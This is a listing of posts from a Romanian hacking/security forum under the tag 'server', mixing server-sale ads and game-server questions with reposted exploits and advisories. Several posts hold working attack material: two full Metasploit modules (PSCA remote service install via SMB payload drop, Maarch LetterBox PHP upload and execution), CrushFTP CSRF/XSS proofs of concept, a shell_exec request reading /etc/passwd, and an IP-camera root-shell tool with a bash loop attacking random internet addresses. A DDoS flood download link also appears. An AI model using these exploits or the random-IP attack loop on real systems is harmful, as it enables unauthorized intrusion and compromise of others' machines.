Jump to content

Search the Community

Showing results for tags 'server'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Vand server dedicat entry level (cu resurse relativ mici) pe datacenter Iomart in UK si suport 24/7 (email, telefonic sau ticket) in UK (lb. engleza). Se aplica legislatia in vigoare. Model: Dell PowerEdge D9-200 OS: Linux la alegere (sau cost in plus lunar pentru Win server) CPU: Quad Core: Intel® Xeon® X3450 (8M Cache, 2.66 GHz) RAM: 32GB DDR3 HDD: 2 x 2TB SATA 7,200 RPM (se poate schimba la cerere pe SSD insa marime mai mica) Raid: H200 Raid Controller - Raid 1 Remote Management: DRAC Enterprise (Virtual KVM) Bandwidth: Port de 1Gbps cu 500Mbps garantat (trafic nelimitat) IP: 4 ip-uri Pret: 7385 RON / an sau 690 RON / luna Se accepta PayPal (+2% cost tranzactie) sau echivalentul in BTC.
  2. HL -PROGRAM V2.6 FLOOD SERVER AND DOWN !!! SCREN: // Warning: Downloadati doar pentru analiza malware D O W N L O A D: HL -PROGRAM v2.6 [FLOOD SERVER AND DOWN].rar — RGhost — file sharing FileShare Download HL -PROGRAM v2.6 [FLOOD SERVER AND DOWN].rar Zippyshare.com - HL -PROGRAM v2.6 [FLOOD SERVER AND DOWN].rar
  3. # Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability # Date: 2014-10-01 # Exploit Author: Ben Turner # Vendor Homepage: Previosuly HP, now http://www.persistentsys.com/ # Version: 7.9, 8.1, 9.0, 9.1 # Tested on: Windows XP, Windows 7, Server 2003 and Server 2008 # CVE-2015-1497 # CVSS: 10 require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # Exploit mixins should be called first include Msf::Exploit::Remote::SMB include Msf::Exploit::EXE include Msf::Auxiliary::Report # Aliases for common classes SIMPLE = Rex::Proto::SMB::Client XCEPT = Rex::Proto::SMB::Exceptions CONST = Rex::Proto::SMB::Constants def initialize super( 'Name' => 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability', 'Description' => %Q{ This module exploits PS Client Automation, by sending a remote service install and creating a callback payload. }, 'Author' => [ 'Ben Turner' ], 'License' => BSD_LICENSE, 'References' => [ ], 'Privileged' => true, 'DefaultOptions' => { 'WfsDelay' => 10, 'EXITFUNC' => 'process' }, 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, 'Platform' => ['win'], 'Targets' => [ [ 'PS Client Automation on Windows XP, 7, Server 2003 & 2008', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'January 10 2014' ) register_options([ OptString.new('SMBServer', [true, 'The IP address of the SMB server', '192.168.1.1']), OptString.new('SMBShare', [true, 'The root directory that is shared', 'share']), Opt::RPORT(3465), ], self.class) end def exploit createservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" createservice << "Nvdkit.exe service install test -path \"c:\\windows\\system32\\cmd.exe /c \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe\"" createservice << "\x22\x00\x00\x00" startservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" startservice << "Nvdkit service start test" startservice << "\x22\x00\x00\x00" removeservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" removeservice << "Nvdkit service remove test" removeservice << "\x22\x00\x00\x00" def filedrop() begin origrport = self.datastore['RPORT'] self.datastore['RPORT'] = 445 origrhost = self.datastore['RHOST'] self.datastore['RHOST'] = self.datastore['SMBServer'] connect() smb_login() print_status("Generating payload, dropping here: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe'...") self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") exe = generate_payload_exe fd = smb_open("\\installservice.exe", 'rwct') fd << exe fd.close self.datastore['RPORT'] = origrport self.datastore['RHOST'] = origrhost rescue Rex::Proto::SMB::Exceptions::Error => e print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n") abort() end end def filetest() begin origrport = self.datastore['RPORT'] self.datastore['RPORT'] = 445 origrhost = self.datastore['RHOST'] self.datastore['RHOST'] = self.datastore['SMBServer'] connect() smb_login() print_status("Checking the remote share: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") file = "\\installservice.exe" filetest = smb_file_exist?(file) if filetest print_good("Found, upload was succesful! \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\#{file}\n") else print_error("\\\\#{datastore['SMBServer']}\\#{file} - The file does not exist, try again!") end self.datastore['RPORT'] = origrport self.datastore['RHOST'] = origrhost rescue Rex::Proto::SMB::Exceptions::Error => e print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n") abort() end end begin filedrop() filetest() connect() sock.put(createservice) print_status("Creating the callback payload and installing the remote service") disconnect sleep(5) connect() sock.put(startservice) print_good("Exploit sent, awaiting response from service. Waiting 15 seconds before removing the service") disconnect sleep(30) connect sock.put(removeservice) disconnect rescue ::Exception => e print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}\n\n") abort() end end end
  4. DeMeDeu

    Server SMS

    Salut baieti. Am si eu o nelamurire. Sa zicem ca vreau sa creez un server pentru mesaje SMS, atat sa trimita cat si sa primesc. Nu ma intereseaza momentan sa il leg de vreun site dar vreau ca pe viitor sa fie posibil(spre exemplu daca da o comanda sau newsletter, etc.). De ce am nevoie ? Teoretic sa zicem ca detin o cartela cu mesaje nelimitate in orice retea romaneasca si un PC care sa fie folosit ca server. De ce mai am nevoie ? Nu vreau explicatia da capo al fine, ci doar instrumentele necesare pentru a face asa ceva, e ceva ce vreau sa folosesc in viitor. Explicatiile de pe google nu m-au lamurit. Va multumesc !
  5. Cum monetizezi un server de CS 1.6 sau CS:GO ? Din ce scot baietii astia cu serverele $$$ ? (excluzand vandutul de admine si alte balarii)
  6. ======================================================== I. Overview ======================================================== Multiple CSRF & Cross-Site Scripting (XSS) vulnerabilities have been identified in Crushftp 7.2.0 (Web Interface) on default configuration. These vulnerabilities allows an attacker to gain control over valid user accounts, perform operations on their behalf, redirect them to malicious sites, steal their credentials, and more. ======================================================== II. Severity ======================================================== Rating: Medium Remote: Yes Authentication Require: Yes ======================================================== III. Vendor's Description of Application ======================================================== CrushFTP is a robust file transfer server that makes it easy to setup secure connections with your users. 'Crush' comes from the built-in zip methods in CrushFTP. They allow for downloading files in compressed formats in-stream, or even automatically expanding zip files as they are received in-stream. This is called ZipStreaming and can greatly accelerate the transfer of many types of files. Secure management is web based allowing you the ability to manage and monitor the server from anywhere, or with almost any device. Easy in place server upgrades without complicated installers. Runs as a daemon, or Windows service with no need for a local GUI. CrushFTP is watching out for you by detecting common hack attempts and robots which scan for weak passwords. It will automatically protect you against DDoS attacks. No need for you to do anything as CrushFTP will automatically ban these IPs to prevent wasted logging and CPU usage. This keeps your server secure from unwanted abuse. User management includes inheritance, groups, and virtual file systems. If you want simple user management, it can be as easy as just making a folder with a specific name and nothing else. Think about how easily you can delegate user administration with CrushFTP's role based administration and event configuration. http://www.crushftp.com/index.html ======================================================== IV. Vulnerability Details & Exploit ======================================================== 1) Multiple CSRF Vulnerabilities (Web Management interface - Default Config) a) An attacker may add/delete/modify user's accounts May change all configuration settings Request Method: POST Location: /WebInterface/fuction/ Proof of Concept:- <html> <body> <form action="http://127.0.0.1:8080/WebInterface/function/" method="POST"> <input type="hidden" name="command" value="setUserItem" /> <input type="hidden" name="data&&95;action" value="new" /> <input type="hidden" name="serverGroup" value="MainUsers" /> <input type="hidden" name="username" value="Hacker" /> <input type="hidden" name="user" value="<&&63;xml&&32;version&&61;"1&&46;0"&&32;encoding&&61;"UTF&&45;8"&&63;><user&&32;type&&61;"properties"><username>Hacker<&&47;username><password>123456<&&47;password><max&&95;logins>0<&&47;max&&95;logins><root&&95;dir>&&47;<&&47;root&&95;dir><&&47;user>" /> <input type="hidden" name="xmlItem" value="user" /> <input type="hidden" name="vfs&&95;items" value="<&&63;xml&&32;version&&61;"1&&46;0"&&32;encoding&&61;"UTF&&45;8"&&63;><vfs&&32;type&&61;"properties"><&&47;vfs>" /> <input type="hidden" name="permissions" value="<&&63;xml&&32;version&&61;"1&&46;0"&&32;encoding&&61;"UTF&&45;8"&&63;><permissions&&32;type&&61;"properties"><item&&32;name&&61;"&&47;">&&40;read&&41;&&40;write&&41;&&40;view&&41;&&40;resume&&41;<&&47;item><&&47;permissions>" /> <input type="submit" value="Submit request" /> </form> </body> </html> 2) Multiple Cross-Site Scripting (Web Interface - Default Config) Type: Reflected Request Method: POST Location: /WebInterface/function/ Parameter: vfs_items Values: <?xml version="XSS PAYLOAD" encoding="XSS PAYLOAD"> vfs_items = <?xml version="XSS PAYLOAD" encoding="XSS PAYLOAD"> Proof of Concept: POST /WebInterface/function/ HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://127.0.0.1:8080/WebInterface/UserManager/index.html Content-Length: 656 Cookie: XXXXXXXXXXXXXXXXXXXXX Connection: keep-alive Pragma: no-cache Cache-Control: no-cache command=setUserItem&data_action=new&serverGroup=MainUsers&username=test&user=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cuser+type%3D%22properties%22%3E%3Cusername%3Etest2%3C%2Fusername%3E%3Cpassword%3Etest2%3C%2Fpassword%3E%3Cmax_logins%3E0%3C%2Fmax_logins%3E%3Croot_dir%3E%2F%3C%2Froot_dir%3E%3C%2Fuser%3E&xmlItem=user&vfs_items=%3C%3Fxml+version%3D%221.0<a%20xmlns:a%3d'http://www.w3.org/1999/xhtml'><a:body%20onload%3d'alert(1)'/></a>%22+encoding%3D%22UTF-8%22%3F%3E%3Cvfs+type%3D%22properties%22%3E%3C%2Fvfs%3E&permissions=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cpermissions+type%3D%22properties%22%3E%3Citem+name%3D%22%2F%22%3E(read)(view)(resume)%3C%2Fitem%3E%3C%2Fpermissions%3E Type: Reflected Request Method: GET Location: /WebInterface/function/ Parameter: path Values: <script>alert(1)<%2fscript> path=%<script>alert(1)<%2fscript> GET /WebInterface/function/?command=getXMLListing&format=JSONOBJ&path=%<script>alert(1)<%2fscript>&random=0.3300707341372783 HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://127.0.0.1:8080/ Cookie: XXXXXXXXXXXXXXXXXXXXXXXX Connection: keep-alive Pragma: no-cache Cache-Control: no-cache ======================================================== VI. Affected Systems ======================================================== Software: Crushftp (Web Interface) Version: 7.2.0 Build : 147 < 7.3 Configuration: Default ======================================================== VII. Vendor Response/Solution ======================================================== Vendor Contacted : 02/12/2015 Vendor Response : 02/12/2015 Solution : upgrade to 7.3 or change <csrf>true</csrf> in prefs.xml ======================================================== VIII. Credits ======================================================== Discovered by Rehan Ahmed knight_rehan@hotmail.com Source
  7. Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris. Changes: Added non-existent file to the regression test config. Multiple bug fixes. Link download: here Link project: Samhain Labs | samhain
  8. -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 PHP Code Execution in jui_filter_rules Parsing Library ====================================================== Researcher: Timo Schmid <tschmid@ernw.de> Description =========== jui_filter_rules[1] is a jQuery plugin which allows users to generate a ruleset which could be used to filter datasets inside a web application. The plugin also provides a PHP library to turn the user submitted ruleset into SQL where statements for server side filtering. This PHP library contains a feature which allows to convert the submitted filter values with server side functions. These functions can be specified within the ruleset, which leads to an arbitrary PHP code execution. Exploitation Technique ====================== Remote Severity Level ============== Critical CVSS Base Score =============== 6.8 (AV:N / AC:M / Au:N / C:P / I:P / A:P) CVE-ID ====== <unassigned> Impact ====== By using the provided rule parsing library to generate SQL statements, an attacker is capable of executing arbitrary PHP code in the context of the web server. This could lead to a full compromise of the web server. The attack vector could be limited by existing validation mechanisms around the library, but this would require a partial manual parsing of the user supplied rules. Status ====== Reported Vulnerable Code Section ======================= server_side/php/jui_filter_rules.php: [...] private function create_filter_value_sql($filter_type, $operator_type, ... [...] if(is_array($filter_value_conversion_server_side)) { $function_name = $filter_value_conversion_server_side['function_name']; $args = $filter_value_conversion_server_side['args']; $arg_len = count($args); for($i = 0; $i < $vlen; $i++) { // create arguments values for this filter value $conversion_args = array(); for($a = 0; $a < $arg_len; $a++) { if(array_key_exists('filter_value', $args[$a])) { array_push($conversion_args, $a_values[$i]); } if(array_key_exists('value', $args[$a])) { array_push($conversion_args, $args[$a]['value']); } } // execute user function and assign return value to filter value try { $a_values[$i] = call_user_func_array($function_name, $conversion_args); } catch(Exception $e) { $this->last_error = array( 'element_rule_id' => $element_rule_id, 'error_message' => $e->getMessage() ); break; } } } [...] The provided PHP parsing library allows to specify a PHP function to convert the supplied filter value on the server side. This leads ultimatively to code execution through attacker supplied input. As no whitelist approach is used, any existing PHP function could be executed (including shell commands). Proof of Concept ================ Using the demo application from the git repository: Executing shell_exec('cat /etc/passwd') Request: POST /ajax_create_sql.dist.php HTTP/1.0 host: http://www.example.com X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Content-Length: 471 a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bfunction_name%5D=she ll_exec&a_rules%5B0%5D%5Bcondition%5D%5BfilterValue%5D=&a_rules%5B0%5D%5Bfilte r_value_conversion_server_side%5D%5Bargs%5D%5B0%5D%5Bvalue%5D=cat+%2Fetc%2Fpas swd&pst_placeholder=question_mark&a_rules%5B0%5D%5Belement_rule_id%5D=foo&use_ ps=yes&a_rules%5B0%5D%5Bcondition%5D%5Bfield%5D=some_field&a_rules%5B0%5D%5Bco ndition%5D%5Boperator%5D=equal&a_rules%5B0%5D%5Bcondition%5D%5BfilterType%5D=d ate Response: HTTP/1.1 200 OK Date: Tue, 13 Jan 2015 02:12:33 GMT Server: Apache/2.2.22 (Debian) Content-Length: 530 Content-Type: text/html {"sql":"WHERE \nsome_field = ?","bind_params":"root:x:0:0:admin COSMOS:/root:/ bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\ns ys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:ga mes:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/va r/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/s pool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:pr oxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh"} Solution ======== This functionality should generally be removed or replaced by a mapping/ whitelist approach and strict type filtering to prevent arbitrary code execution. Affected Versions ================= >= git commit b1e795eeba1bac2f9b0d383cd3da24d6d26ccb4b < 1.0.6 (commit 0b61463cd02cc1814046b516242779b29ba7d1e1) Timeline ======== 2015-01-12: Vulnerability found 2015-01-13: Developer informed 2015-02-14: Fixed in version 1.0.6 (git 0b61463cd02cc1814046b516242779b29ba7d1e1) References ========== [1] http://www.pontikis.net/labs/jui_filter_rules [2] https://www.owasp.org/index.php/Code_Injection [3] https://www.ernw.de/download/BC-1501.txt [4] https://bufferoverflow.eu/BC-1501.txt Advisory-ID =========== BC-1501 Disclaimer ========== The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/ distributor be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. - -- Timo Schmid ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg - www.ernw.de Tel. +49 6221 48039-0 (HQ) - Fax +49 6221 419008 - Cell +49 151 16227192 PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0 Handelsregister Mannheim: HRB 337135 Geschaeftsfuehrer: Enno Rey ============================================================== || Blog: www.insinuator.net | | Conference: www.troopers.de || ============================================================== ================== TROOPERS15 ================== * International IT Security Conference & Workshops * 16th - 20st March 2015 / Heidelberg, Germany * www.troopers.de ==================================================== -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBAwAGBQJU5KMNAAoJEHq2kn1vJmzgroMIAIsvJOdkZLSIjp1bdczg7NFP YBcVZNXXd7H2LES/bH20wGHMEke2YfL97CfjBk5R1OpBaialTHHi/HrzqbnWft2x x+u7rOdG0Q+aAAakoBpO7wG1B97+bmXnR6ytgFtxgJO+dfWWwAxhjsqjQ0boRgMr bzhFkHznlUV2s89n6vEBG2qnowSNqJgnWpbkyekCyISF87bh4nfuNDoj40+aCCNa Iw3AO8S2bvgVqY980hovoCsW94764/65mVMr2dvTlQx3tR1zTra2km8yq0IOtdIs AJ8dicIAN0EDuGQKFtLbxkShh4E9spXeQlFRmz1kLa76PELHzJWnyhKUB4o+uds= =tnwW -----END PGP SIGNATURE----- Source
  9. Requirements PHP 5 A distribution of Linux. I haven’t and won’t test this on Windows. IP Cam Shell Usage Using IPCS is pretty straight forward. You pass the URL to ipcs.php via the -u option. $ php ipcs.php -u http://192.168.0.3:8080 If the camera is vulnerable you’ll be dropped in to a “shell” as root and be able to exploit the camera further. $ php ipcs.php -u http://192.168.0.3:8080 Those who do not understand UNIX are condemned to reinvent it, poorly. — Henry Spencer ipcamshell> It’s very much like being logged in to a stripped down Unix server as root. ipcamshell> whoami root ipcamshell> id uid=0(root) gid=0(root) ipcamshell> ls / bin dev etc lib linuxrc mnt opt proc sbin scripts tmp usr var ipcamshell> cat /etc/passwd root:x:0:0:Linux User,,,:/:/bin/sh Use quit, exit, or ^C to exit. Further Attacks Of course it wouldn’t be very fun without the ability to login and view the camera… ipcamshell> getadminpass Username: admin Password: hunter2 If you wish to kill the web server (to prevent someone from accessing the web interface temporarily), run the killswitch command. Note that the camera will continue to record regardless of this. Shutting the server down might switch the camera off, although that’s complete speculation. If the camera isn’t vulnerable, the server isn’t up, or the internet hates you, you’ll recieve the following message: Sorry, the server specified isn't vulnerable. Automation IPCS has the potential to be automated in different ways. This, I’m going to leave to you. The -coption won’t drop you in to a shell after successfully exploiting a server, and the -g option surpresses the “Sorry, the server specified isn’t vulnerable.” messages for failed attempts. As an example, the following bash script will forever try to attack randomly generated IPv4 addresses. #!/bin/bash while true; do export ip=$((RANDOM%256)).$((RANDOM%256)).$((RANDOM%256)).$((RANDOM%256)) && echo "Trying $ip..." && php ipcs.php -c 1 -g 1 -u http://$ip; done; This is slow, and will likely yield nothing without extremely good luck. Use your imagination. Download https://github.com/SintheticLabs/ipcamshell
  10. ## # This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'uri' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info( info, 'Name' => 'Maarch LetterBox 2.8 Unrestricted File Upload', 'Description' => %q{ This module exploits a file upload vulnerability on Maarch LetterBox 2.8 due to a lack of session and file validation in the file_to_index.php script. It allows unauthenticated users to upload files of any type and subsequently execute PHP scripts in the context of the web server. }, 'License' => MSF_LICENSE, 'Author' => [ 'Rob Carr <rob[at]rastating.com>' ], 'References' => [ ['CVE', '2015-1587'] ], 'DisclosureDate' => 'Feb 11 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['Maarch LetterBox 2.8', {}]], 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The base path to Maarch LetterBox', '/']) ], self.class) end def letterbox_login_url normalize_uri(target_uri.path, 'login.php') end def letterbox_upload_url normalize_uri(target_uri.path, 'file_to_index.php') end def check res = send_request_cgi('method' => 'GET', 'uri' => letterbox_login_url) if res.nil? || res.code != 200 return Msf::Exploit::CheckCode::Unknown elsif res.body.include?('alt="Maarch Maerys Archive v2.1 logo"') return Msf::Exploit::CheckCode::Appears end Msf::Exploit::CheckCode::Safe end def generate_mime_message(payload, name) data = Rex::MIME::Message.new data.add_part(payload.encoded, 'text/plain', 'binary', "form-data; name=\"file\"; filename=\"#{name}\"") data end def exploit print_status("#{peer} - Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha(10)}.php" data = generate_mime_message(payload, payload_name) print_status("#{peer} - Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => letterbox_upload_url, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s ) fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 print_status("#{peer} - Parsing server response...") captures = res.body.match(/\[local_path\] => (.*\.php)/i).captures fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') if captures.nil? || captures[0].nil? payload_url = normalize_uri(target_uri.path, captures[0]) print_good("#{peer} - Response parsed successfully") print_status("#{peer} - Executing the payload at #{payload_url}") register_files_for_cleanup(File.basename(URI.parse(payload_url).path)) send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5) end end Source
  11. Security researchers with Russian anti-virus company Doctor Web have examined a complex, multi-purpose backdoor for Linux. This malicious program can execute various commands issued by intruders such as to mount DDoS attacks and to perform a wide range of other malicious tasks. To spread the new Linux backdoor, dubbed Linux.BackDoor.Xnote.1, criminals mount a brute force attack to establish an SSH connection with a target machine. Doctor Web security researchers believe that the Chinese hacker group ChinaZ may be behind this backdoor. Once Linux.BackDoor.Xnote.1 gets in, it checks to see whether its copy is already running in the infected system. If it is, the backdoor exits. The malware will only be installed in a system if it has been launched with superuser (root) privileges. During installation, the malware creates a copy of itself in the /bin/ directory in the form of a file called iptable6. It then deletes the original file that was used to launch it. Linux.BackDoor.Xnote.1 also searches the /etc/init.d/ directory for a script that starts with the line "#!/bin/bash" and adds another line to it so that the backdoor will be launched automatically. The program uses the following routine to exchange data with the intruders' control server. To obtain configuration data, the backdoor looks for a special string in its body—the string points to the beginning of the encrypted configuration block, then decrypts it and starts sending queries to control servers on the list until it finds a responding server or until the list ends. Both the backdoor and the server use the library zlib to compress the packets they exchange. First, Linux.BackDoor.Xnote.1 sends information about the infected system to the server. It then goes into standby mode and awaits further instructions. If the command involves carrying out some task, the backdoor creates a separate process that establishes its own connection to the server through which it gets all the necessary configuration data and sends the results of the executed task. Thus, when commanded to do so, Linux.BackDoor.Xnote.1 can assign a unique ID to an infected machine, start a DDoS attack on a remote host with a specific address (it can mount SYN Flood, UDP Flood, HTTP Flood and NTP Amplification attacks), stop an attack, update its executable, write data to a file, or remove itself. The backdoor can also perform a number of actions with files. Having received the appropriate command, Linux.BackDoor.Xnote.1 sends information about the file system of the infected computer (the total number of data blocks in the file system and the number of free blocks) to the server and stands by for other directives which can include: List files and directories inside the specified directory. Send directory size data to the server. Create a file in which received data can be stored. Accept a file. Send a file to the command and control (C&C) server. Delete a file. Delete a directory. Signal the server that it is ready to accept a file. Create a directory. Rename a file. Run a file. In addition, the backdoor can run a shell with the specified environment variables and grant the C&C server access to the shell, start a SOCKS proxy on an infected computer, or start its own implementation of the portmap server. The signature of this malware has been added to the Dr.Web virus database, so systems protected by Dr.Web Anti-virus for Linux are safe from this backdoor. Source
  12. Salut, asa cum spune si topic-ul, pun in folosinta un server de TS3, voi adauga si licenta saptamana asta... Administratorii Moderatorii, cat si membrii sunt bine veniti, adresa este : rst.god.ro sau ts.god.ro, cum va vine mai usor. Multumesc. bump'
  13. Here we will be looking a kernel level privilege escalation vulnerability CVE - 2014 - 4113 . The vulnerability is exploited by creating tagWND structure at NULL page (0x000 00000). We’ll see here why control is transferred to the shellcode and the reason the malicious tagWND structure is th e crafted the way it is. User - Mode Code The exe first tries to determine the OS it is running on and stores the following data in the vari able based on the OS version and build: Windows Xp S p2 0c8 Windows Xp S p1 12c Windows Xp S p3 0d8 Windows Server 2008 0e0 windows 7 / Windows Server 2008 R2 0f8 Read more: http://www.exploit-db.com/wp-content/themes/exploit/docs/35937.pdf
  14. SEC Consult Vulnerability Lab Security Advisory < 20150122-0 > ======================================================================= title: Multiple critical vulnerabilities products: Symantec Data Center Security: Server Advanced (SDCS:SA) Symantec Critical System Protection (SCSP) vulnerable version: see: Vulnerable / tested versions fixed version: SCSP 5.2.9 MP6, SDCS:SA 6.0 MP1 - not all vulnerabilities were fixed, but mitigations exist impact: Critical CVE number: CVE-2014-7289, CVE-2014-9224, CVE-2014-9225, CVE-2014-9226 homepage: http://www.symantec.com found: 2014-09-19 by: Stefan Viehböck SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Symantec Data Center Security: Server Advanced v6.0 (DCS: Server Advanced) extends the Data Center Security: Server solution beyond agentless threat protections by incorporating technologies previous known as Critical System Protection. Data Center Security: Server Advanced provides granular, policy- based controls with a low impact in-guest agent to monitor and protect numerous physical and virtual server environments. Through a combination of technologies including application-centric controls including protected white listing, sandboxing using least privilege access controls, host-based intrusion detection (HIDS) and prevention (HIPS), and real-time file integrity monitoring (FIM), organizations can proactively safeguard their heterogeneous server environments and the information they contain from zero-day and targeted attacks, and fulfill their compliance mandates across critical systems. Click here for more info" Source: http://www.symantec.com/connect/forums/announcing-data-center-security-server-server-advanced-products Business recommendation: ------------------------ Attackers are able to completely compromise the SDCS:SA Server as they can gain access at the system and database level. Furthermore attackers can manage all clients and their policies. SDCS:SA Server can be used as an entry point into the target infrastructure (lateral movement, privilege escalation). Furthermore the SDCS:SA Client protections can be bypassed in several ways. It is highly recommended by SEC Consult not to use this software until a thorough security review (SDCS:SA Server, SDCS:SA Client Policies) has been performed by security professionals and all identified issues have been resolved. Note: SDCS:SA was replaced by SCSP. In this document the name SDCS:SA is used. Vulnerability overview/description: ----------------------------------- 1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289) Due to insufficient input validation, the application allows the injection of direct SQL commands. By exploiting the vulnerability, an attacker gains access (read/write) to all records stored in the database as arbitrary SQL statements can be executed. Furthermore the application design enables an attacker to gain code execution as SYSTEM (highest privilege Windows user) on the server by exploiting this vulnerability. No prior authentication is needed to exploit this vulnerability. Affected script: https://<host>:4443/sis-ui/authenticate 2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224) The applications suffers from a reflected cross-site scripting vulnerability, which allows an attacker to steal other users' sessions, to impersonate other users and to gain unauthorized access to the admin interface. Affected scripts: https://<host>:8081/webui/Khaki_docs/SSO-Error.jsp https://<host>:8081/webui/admin/WCUnsupportedClass.jsp 3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225) A script discloses internal information about the application on the server without prior authentication. This information includes file paths on the webserver, version information (OS, Java) and is accessible without prior authentication. Affected script: https://<host>:8081/webui/admin/environment.jsp 4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client) (CVE-2014-9226) Several bypasses were discovered. These require Windows Administrator permissions. This requirement is usually met in SDCS:SA deployments. Note: SEC Consult did not check whether the mitigations provided by Symantec do in fact sufficiently mitigate these vulnerabilities! - Persistent code execution via Windows Services The default Symantec policy rules can be bypassed in order to get persistent arbitrary code execution. - Remote code execution via RPC The default Symantec policy rules can be bypassed in order to get persistent arbitrary code execution. In addition to that "psexec-style" remote code execution via SMB is possible as well. - Policy bypass: Extraction of Windows passwords/hashes The default Symantec policy rules do not prevent attackers from extracting the Windows passwords/password hashes from the System. - Privilege elevation via Windows Installer (msiexec.exe) The restrictions imposed by the default policies can be bypassed entirely by exploiting incorrect assumptions made in the policy regarding the Windows Installer (msiexec.exe). - Privilege elevation/code execution via Windows 